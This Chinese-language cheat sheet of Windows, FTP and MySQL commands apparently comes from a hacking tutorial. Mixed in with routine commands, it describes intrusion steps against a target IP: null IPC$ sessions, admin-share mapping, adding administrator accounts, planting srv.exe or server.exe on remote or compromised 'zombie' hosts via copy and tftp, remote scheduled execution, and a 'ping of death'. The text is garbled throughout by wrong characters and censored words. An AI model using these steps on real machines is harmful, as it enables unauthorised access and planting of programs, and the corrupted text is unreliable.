net use [url=file://ip/ipc$]\\ip\ipc$[/url] " " /user:" " 創建IPC空連接net use [url=file://ip/ipc$]\\ip\ipc$[/url] "密碼" /user:"用戶名" 創建IPC非空連接net use h: [url=file://ip/c$]\\ip\c$[/url] "密碼" /user:"用戶名" 直接登錄後映射對方C:到本地爲H:net use h: [url=file://ip/c$]\\ip\c$[/url] 登錄後映射對方C:到本地爲H:net use [url=file://ip/ipc$]\\ip\ipc$[/url] /del 刪除IPC連接net use h: /del 刪除映射對方到本地的爲H:的映射net user 用戶名 密碼 /add 創建用戶net user guest /active:yes 激活guest用戶net user 查看有哪些用戶net user 賬戶名 查看賬戶的屬性net localgroup ***istrators 用戶名 /add 把「用戶」添加到管理員中使其具備管理員權限,注意:***istrator後加s用複數net start 查看開啓了哪些服務net start 服務名 開啓服務;(如:net start telnet, net start schedule)net stop 服務名 中止某服務net time \\目標ip 查看對方時間net time \\目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息net view 查看本地局域網內開啓了哪些共享net view [url=file://ip/]\\ip[/url] 查看對方局域網內開啓了哪些共享net config 顯示系統網絡設置net logoff 斷開鏈接的共享net pause 服務名 暫停某服務net send ip "文本信息" 向對方發信息net ver 局域網內正在使用的網絡鏈接類型和信息net share 查看本地開啓的共享net share ipc$ 開啓ipc$共享net share ipc$ /del 刪除ipc$共享net share c$ /del 刪除C:共享net user guest 12345 用guest用戶登錄後用將密碼改成12345net password 密碼 更改系統登錄密碼netstat -a 查看開啓了哪些端口,經常使用netstat -annetstat -n 查看端口的網絡鏈接狀況,經常使用netstat -annetstat -v 查看正在進行的工做netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用狀況(查看tcp/ip協議使用狀況)netstat -s 查看正在使用的全部協議使用狀況nbtstat -A ip 對方136到139其中一個端口開了的話,就可查看對方最近登錄的用戶名(03前的爲用戶名)-注意:參數-A要大寫tracert -參數 ip(或計算機名) 跟蹤路由(數據包),參數:「-w數字」用於設置超時間隔。ping ip(或域名) 向對方主機發送默認大小爲32字節的數據,參數:「-l[空格]數據包大小」;「-n發送數據次數」;「-t」指一直ping。ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數「/all」顯示所有配置信息tlist -t 以樹行列表顯示進程(爲系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)kill -F 進程名 加-F參數後強制結束某進程(爲系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔之外的文件。例如「DEL/AR *.*」表示刪除當前目錄下全部只讀文件,「DEL/A-S *.*」表示刪除當前目錄下除系統文件之外的全部文件del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的全部子目錄和文件。同時使用參數/Q 可取消刪除操做時的系統確認就直接刪除。(二個命令做用相同)move 盤符\路徑\要移動的文件名 存放移動文件的路徑\移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋fc one.txt two.txt > 3st.txt 對比二個文件並把不一樣之處輸出到3st.txt文件中,"> "和"> >" 是重定向命令at id號 開啓已註冊的某個計劃任務at /delete 中止全部計劃任務,用參數/yes則不須要確認就直接中止at id號 /delete 中止某個已註冊的計劃任務at 查看全部的計劃任務at [url=file://ip/]\\ip[/url] time 程序名(或一個命令) /r 在某時間運行對方某程序並從新啓動計算機finger username @host 查看最近有哪些用戶登錄telnet ip 端口 遠和登錄服務器,默認端口爲23open ip 鏈接到IP(屬telnet登錄後的命令)telnet 在本機上直接鍵入telnet 將進入本機的telnetcopy 路徑\文件名1 路徑\文件名2 /y 複製文件1到指定的目錄爲文件2,用參數/y就同時取消確認你要改寫一份現存目錄文件copy c:\srv.exe [url=file://ip/***$]\\ip\***$[/url] 複製本地c:\srv.exe到對方的***下cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指ASCLL格式文件copy [url=file://ip/***$/svv.exe]\\ip\***$\svv.exe[/url] c:\ 或:copy\\ip\***$\*.* 複製對方***i$共享下的srv.exe文件(全部文件)至本地C:xcopy 要複製的文件或目錄樹 目標地址\目錄名 複製文件和目錄樹,用參數/Y將不提示覆蓋相同文件tftp -i 本身IP(用肉機做跳板時這用肉機IP) get server.exe c:\server.exe 登錄後,將「IP」的server.exe下載到目標主機c:\server.exe 參數:-i指以二進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模式)進行傳送tftp -i 對方IP put c:\server.exe 登錄後,上傳本地c:\server.exe至主機ftp ip 端口 用於上傳文件至服務器或進行文件操做,默認端口爲21。bin指用二進制方式傳送(可執行文件進);默認爲ASCII格式傳送(文本文件時)route print 顯示出IP路由,將主要顯示網絡地址Network addres,子網掩碼Netmask,網關地址Gateway addres,接口地址Interfacearp 查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出所有信息start 程序名或命令 /max 或/min 新開一個新窗口並最大化(最小化)運行某程序或命令mem 查看cpu使用狀況attrib 文件名(目錄名) 查看某文件(目錄)的屬性attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔,只讀,系統,隱藏 屬性;用+則是添加爲某屬性dir 查看文件,參數:/Q顯示文件及目錄屬系統哪一個用戶,/T:C顯示文件建立時間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間,而沒必要輸入新日期和時間set 指定環境變量名稱=要指派給變量的字符 設置環境變量set 顯示當前全部的環境變量set p(或其它字符) 顯示出當前以字符p(或其它字符)開頭的全部環境變量pause 暫停批處理程序,並顯示出:請按任意鍵繼續....if 在批處理程序中執行條件處理(更多說明見if命令及變量)goto 標籤 將cmd.exe導向到批處理程序中帶標籤的行(標籤必須單獨一行,且以冒號打頭,例如:「:start」標籤)call 路徑\批處理文件名 從批處理程序中調用另外一個批處理程序 (更多說明見call /?)for 對一組文件中的每個文件執行某個特定命令(更多說明見for命令及變量)echo on或off 打開或關閉echo,僅用echo不加參數則顯示當前echo設置echo 信息 在屏幕上顯示出信息echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中findstr "Hello" aa.txt 在aa.txt文件中尋找字符串hellofind 文件名 查找某文件title 標題名字 更改CMD窗口標題名字color 顏色值 設置cmd控制檯前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改成:EntSky\ )ver 在DOS窗口下顯示版本信息winver 彈出一個窗口顯示版本信息(內存大小、系統版本、補丁版本、計算機名)format 盤符 /FS:類型 格式化磁盤,類型:FAT、FAT3二、NTFS ,例:Format D: /FS:NTFSmd 目錄名 建立目錄replace 源文件 要替換文件的目錄 替換文件ren 原文件名 新文件名 重命名文件名tree 以樹形結構顯示出目錄,用參數-f 將列出第個文件夾中文件名稱type 文件名 顯示文本文件的內容more 文件名 逐屏顯示輸出文件doskey 要鎖定的命令=字符doskey 要解鎖命令= 爲DOS提供的鎖定命令(編輯命令行,從新調用win2k命令,並建立宏)。如:鎖定dir命令:doskey dir=entsky (不能用doskey dir=dir);解鎖:doskey dir=taskmgr 調出任務管理器chkdsk /F D: 檢查磁盤D並顯示狀態報告;加參數/f並修復磁盤上的錯誤tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就能夠更改telnet服務默認端口23爲其它任何端口exit 退出cmd.exe程序或目前,用參數/B則是退出當前批處理腳本而不是cmd.exepath 路徑\可執行文件的文件名 爲可執行文件設置一個路徑。cmd 啓動一個win2K命令解釋窗口。參數:/eff、/en 關閉、開啓命令擴展;更我詳細說明見cmd /?regedit /s 註冊表文件名 導入註冊表;參數/S指安靜模式導入,無任何提示;regedit /e 註冊表文件名 導出註冊表cacls 文件名 參數 顯示或修改文件訪問控制列表(ACL)——針對NTFS格式時。參數:/D 用戶名:設定拒絕某用戶訪問;/P 用戶名erm 替換指定用戶的訪問權限;/G 用戶名erm 賦予指定用戶訪問權限;Perm 能夠是: N 無,R 讀取, W 寫入, C 更改(寫入),F 徹底控制;例:cacls D:\test.txt /D pub 設定d:\test.txt拒絕pub用戶訪問。cacls 文件名 查看文件的訪問用戶權限列表REM 文本內容 在批處理文件中添加註解netsh 查看或更改本地網絡配置狀況IIS服務命令:iisreset /reboot 重啓win2k計算機(但有提示系統將重啓信息出現)iisreset /start或stop 啓動(中止)全部Internet服務iisreset /restart 中止而後從新啓動全部Internet服務iisreset /status 顯示全部Internet服務狀態iisreset /enable或disable 在本地系統上啓用(禁用)Internet服務的從新啓動iisreset /rebootonerror 當啓動、中止或從新啓動Internet服務時,若發生錯誤將從新開機iisreset /noforce 若沒法中止Internet服務,將不會強制終止Internet服務iisreset /timeout Val在到達逾時間(秒)時,仍未中止Internet服務,若指定/rebootonerror參數,則電腦將會從新開機。預設值爲從新啓動20秒,中止60秒,從新開機0秒。FTP 命令: (後面有詳細說明內容)ftp的命令行格式爲:ftp -v -d -i -n -g[主機名] -v 顯示遠程服務器的全部響應信息。-d 使用調試方式。-n 限制ftp的自動登陸,即不使用.netrc文件。-g 取消全局文件名。help [命令] 或 ?[命令] 查看命令說明bye 或 quit 終止主機FTP進程,並退出FTP管理方式.pwd 列出當前遠端主機目錄put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中mget [remote-files] 從遠端主機接收一批文件至本地主機mput local-files 將本地主機中一批文件傳送至遠端主機dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.若是有本地文件,就將結果寫至本地文件ascii 設定以ASCII方式傳送文件(缺省值)bin 或 p_w_picpath 設定以二進制方式傳送文件bell 每完成一次文件傳送,報警提示cdup 返回上一級目錄close 中斷與遠程服務器的ftp會話(與open對應)open host[port] 創建指定ftp服務器鏈接,可指定鏈接端口delete 刪除遠端主機中的文件mdelete [remote-files] 刪除一批文件mkdir directory-name 在遠端主機中創建目錄rename [from] [to] 改變遠端主機中的文件名rmdir directory-name 刪除遠端主機中的目錄status 顯示當前FTP的狀態system 顯示遠端主機系統類型user user-name [password] [account] 從新以別的用戶名登陸遠端主機open host [port] 從新創建一個新的鏈接prompt 交互提示模式macdef 定義宏命令lcd 改變當前本地主機的工做目錄,若是缺省,就轉到當前用戶的HOME目錄chmod 改變遠端主機的文件權限case 當爲ON時,用MGET命令拷貝的文件名到本地機器中,所有轉換爲小寫字母cd remote-dir 進入遠程主機目錄cdup 進入遠程主機目錄的父目錄! 在本地機中執行交互shell,exit回到ftp環境,如!ls*.zipMYSQL 命令:mysql -h主機地址 -u用戶名 -p密碼 鏈接MYSQL;若是剛安裝好MYSQL,超級用戶root是沒有密碼的。(例:mysql -h110.110.110.110 -Uroot -P123456注:u與root能夠不用加空格,其它也同樣)exit 退出MYSQLmysql*** -u用戶名 -p舊密碼 password 新密碼 修改密碼grant select on 數據庫.* to 用戶名@登陸主機 identified by \"密碼\"; 增長新用戶。(注意:和上面不一樣,下面的由於是MYSQL環境中的命令,因此後面都帶一個分號做爲命令結束符)show databases; 顯示數據庫列表。剛開始時才兩個數據庫:mysql和test。mysql庫很重要它裏面有MYSQL的系統信息,咱們改密碼和新增用戶,實際上就是用這個庫進行操做。